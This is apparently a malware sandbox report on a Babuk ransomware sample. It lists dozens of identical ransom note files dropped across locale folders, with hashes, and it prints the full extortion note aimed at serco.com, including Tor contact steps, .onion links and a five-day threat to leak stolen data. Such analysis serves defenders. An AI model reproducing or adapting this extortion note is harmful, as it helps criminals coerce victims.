                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-LY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-MA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-OM\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-QA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-SA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-SY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-TN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-YE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\az-Latn-AZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\bg-BG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\bn-BD\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ca-ES\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\cs-CZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\da-DK\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-AT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-CH\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-DE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-LI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\de-LU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\el-GR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-029\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-AU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-BZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-CA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-GB\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-HK\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-ID\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-IE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-IN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-JM\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-MY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-NZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-SG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-TT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-ZA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-ZW\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-419\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-AR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-BO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-CL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-CO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-CR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-DO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-EC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-ES\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-GT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-HN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-MX\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-NI\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-PA\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-PE\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-PR\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-PY\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-SV\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-US\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-UY\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-VE\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\et-EE\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\eu-ES\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fa-IR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fi-FI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-029\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
